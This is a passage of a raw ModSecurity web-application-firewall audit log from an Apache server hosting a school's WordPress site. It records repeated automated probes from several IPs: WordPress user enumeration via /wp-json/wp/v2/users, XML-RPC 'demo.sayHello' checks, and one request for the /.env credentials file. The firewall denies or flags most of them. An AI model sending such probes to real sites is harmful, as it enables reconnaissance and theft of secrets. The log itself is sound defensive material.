(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab1c17b-Z-- --29e1056e-A-- [03/May/2025:22:01:48 +0700] aBYv3IOgvPi2IO4kz1v86wAAAIU 103.236.140.4 36794 103.236.140.4 8181 --29e1056e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29e1056e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29e1056e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284508906945 2932 (- - -) Stopwatch2: 1746284508906945 2932; combined=1311, p1=453, p2=828, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29e1056e-Z-- --081fb218-A-- [03/May/2025:22:01:52 +0700] aBYv4IOgvPi2IO4kz1v87AAAAII 103.236.140.4 36798 103.236.140.4 8181 --081fb218-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --081fb218-C-- demo.sayHello --081fb218-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --081fb218-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284512241900 4666 (- - -) Stopwatch2: 1746284512241900 4666; combined=3731, p1=431, p2=3009, p3=22, p4=24, p5=135, sr=66, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --081fb218-Z-- --9ac86053-A-- [03/May/2025:22:08:50 +0700] aBYxgileQJs6d7wanHHPnwAAAM4 103.236.140.4 36830 103.236.140.4 8181 --9ac86053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac86053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac86053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284930814838 3164 (- - -) Stopwatch2: 1746284930814838 3164; combined=1314, p1=460, p2=825, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac86053-Z-- --f7cf135a-A-- [03/May/2025:22:08:53 +0700] aBYxhYOgvPi2IO4kz1v89gAAAJY 103.236.140.4 36834 103.236.140.4 8181 --f7cf135a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7cf135a-C-- demo.sayHello --f7cf135a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7cf135a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284933643933 6300 (- - -) Stopwatch2: 1746284933643933 6300; combined=4490, p1=584, p2=3674, p3=31, p4=34, p5=98, sr=99, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7cf135a-Z-- --da0b200d-A-- [03/May/2025:22:13:38 +0700] aBYyoileQJs6d7wanHHPoAAAANM 103.236.140.4 36862 103.236.140.4 8181 --da0b200d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da0b200d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0b200d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285218934986 3342 (- - -) Stopwatch2: 1746285218934986 3342; combined=1435, p1=470, p2=934, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0b200d-Z-- --579e0b5b-A-- [03/May/2025:22:13:41 +0700] aBYypYOgvPi2IO4kz1v8_gAAAI0 103.236.140.4 36866 103.236.140.4 8181 --579e0b5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --579e0b5b-C-- demo.sayHello --579e0b5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --579e0b5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285221742131 5447 (- - -) Stopwatch2: 1746285221742131 5447; combined=4039, p1=529, p2=3295, p3=29, p4=33, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --579e0b5b-Z-- --20a0af49-A-- [03/May/2025:22:18:34 +0700] aBYzyoOgvPi2IO4kz1v9BQAAAJY 103.236.140.4 36896 103.236.140.4 8181 --20a0af49-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --20a0af49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20a0af49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285514086662 3096 (- - -) Stopwatch2: 1746285514086662 3096; combined=1292, p1=433, p2=824, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20a0af49-Z-- --47d83579-A-- [03/May/2025:22:18:37 +0700] aBYzzcP0ZqGY3Jj2X92X7wAAABM 103.236.140.4 36900 103.236.140.4 8181 --47d83579-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47d83579-C-- demo.sayHello --47d83579-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d83579-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285517821299 5558 (- - -) Stopwatch2: 1746285517821299 5558; combined=4103, p1=501, p2=3344, p3=61, p4=32, p5=95, sr=105, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d83579-Z-- --d7bafc59-A-- [03/May/2025:22:20:03 +0700] aBY0I0SOhfQ6W15Bgg8K7AAAAFA 103.236.140.4 36904 103.236.140.4 8181 --d7bafc59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7bafc59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7bafc59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285603468506 3206 (- - -) Stopwatch2: 1746285603468506 3206; combined=1301, p1=451, p2=820, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7bafc59-Z-- --4953351a-A-- [03/May/2025:22:20:06 +0700] aBY0JoOgvPi2IO4kz1v9CQAAAIc 103.236.140.4 36908 103.236.140.4 8181 --4953351a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4953351a-C-- demo.sayHello --4953351a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4953351a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285606657696 4809 (- - -) Stopwatch2: 1746285606657696 4809; combined=3675, p1=427, p2=3036, p3=22, p4=25, p5=95, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4953351a-Z-- --ac82ef76-A-- [03/May/2025:22:24:58 +0700] aBY1SoOgvPi2IO4kz1v9DAAAAIg 103.236.140.4 36932 103.236.140.4 8181 --ac82ef76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac82ef76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac82ef76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285898237094 2906 (- - -) Stopwatch2: 1746285898237094 2906; combined=1273, p1=462, p2=780, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac82ef76-Z-- --21391031-A-- [03/May/2025:22:25:02 +0700] aBY1TkSOhfQ6W15Bgg8K7gAAAFE 103.236.140.4 36936 103.236.140.4 8181 --21391031-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --21391031-C-- demo.sayHello --21391031-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --21391031-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285902456572 6869 (- - -) Stopwatch2: 1746285902456572 6869; combined=4887, p1=727, p2=3913, p3=35, p4=40, p5=102, sr=190, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21391031-Z-- --b4421e76-A-- [03/May/2025:22:25:13 +0700] aBY1WSleQJs6d7wanHHPpAAAANQ 103.236.140.4 36942 103.236.140.4 8181 --b4421e76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4421e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4421e76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285913837825 3183 (- - -) Stopwatch2: 1746285913837825 3183; combined=1409, p1=472, p2=904, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4421e76-Z-- --3f6c036d-A-- [03/May/2025:22:25:17 +0700] aBY1XYOgvPi2IO4kz1v9DwAAAJU 103.236.140.4 36946 103.236.140.4 8181 --3f6c036d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f6c036d-C-- demo.sayHello --3f6c036d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f6c036d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285917760366 5406 (- - -) Stopwatch2: 1746285917760366 5406; combined=3985, p1=512, p2=3255, p3=31, p4=32, p5=91, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f6c036d-Z-- --de8dd058-A-- [03/May/2025:22:50:20 +0700] aBY7PIOgvPi2IO4kz1v9HAAAAJI 103.236.140.4 37242 103.236.140.4 8181 --de8dd058-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3804.0 Safari/537.36 Accept-Charset: utf-8 --de8dd058-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8dd058-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746287420354893 810 (- - -) Stopwatch2: 1746287420354893 810; combined=329, p1=287, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8dd058-Z-- --30a09134-A-- [03/May/2025:22:51:30 +0700] aBY7goOgvPi2IO4kz1v9HQAAAJE 103.236.140.4 37250 103.236.140.4 8181 --30a09134-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --30a09134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30a09134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746287490802129 3418 (- - -) Stopwatch2: 1746287490802129 3418; combined=1443, p1=478, p2=933, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30a09134-Z-- --c8c72969-A-- [03/May/2025:22:51:34 +0700] aBY7hoOgvPi2IO4kz1v9HwAAAJc 103.236.140.4 37254 103.236.140.4 8181 --c8c72969-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c8c72969-C-- demo.sayHello --c8c72969-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8c72969-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746287494548194 5652 (- - -) Stopwatch2: 1746287494548194 5652; combined=4089, p1=557, p2=3306, p3=28, p4=31, p5=97, sr=82, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 